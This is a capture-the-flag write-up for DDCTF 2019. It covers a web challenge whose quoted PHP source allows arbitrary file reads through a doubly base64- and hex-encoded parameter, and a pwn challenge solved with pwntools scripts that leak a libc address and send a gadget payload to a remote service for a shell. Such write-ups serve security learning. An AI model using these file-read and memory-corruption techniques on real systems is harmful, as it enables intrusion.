DDCTF 2019 WP

1nv0k3r's notebook

2019-04-12

web1 滴

看到url：http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09

解一下这个base64得到 flag.jpg

显然是任意文件读取

尝试读index.php

<?php
/*
 * https://blog.csdn.net/FengBanLiuYun/article/details/80616607
 * Date: July 4,2018
 */
error_reporting(E_ALL || ~E_NOTICE);

header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 */

?>

看起来似乎要绕过str_replace读config.php

最后从注释的CSDN找到另一篇文章：https://blog.csdn.net/FengBanLiuYun/article/details/80913909

文章里提到文件名.practice.txt.swp

最后要读的文件是practice.txt.swp ？？？？？？？？？？？？？？？？？？？？？？

读到flag，加上DDCTF{}：DDCTF{f1ag!ddctf.p}

pwn

本次比赛唯一一个pwn

from pwn import *
context.log_level = 'debug'
p = process('./xpwn')
p.recv()
p.sendline('a')
p.recv()
p.sendline('-1')
p.recv()
p.sendline('A' * 0x4c)
from pwn import *


context.log_level = 'debug'

# p = process('./xpwn')
p = remote('116.85.48.105',5005)
libc = ELF('./libc.so.6')

p.sendafter('Enter username:','AAAA'*0x6)
p.recvuntil('A'*24)
# print hex(libc.symbols['_IO_setbuffer'])
# print(hex(u32(addr)))
libc_addr = u32(p.recv(4))-0x5f6bb
log.success("libc_addr="+hex(libc_addr))
# gdb.attach(p)

p.sendlineafter('Please set the length of password:',str(-5))
# payload = p32(libc_addr+0x5f065)*(0x10+1)+'\x00'
payload = p32(libc_addr+0x5f065)*17+'\x00'
print len(payload)
p.sendafter('):',payload)
p.recv()
p.interactive()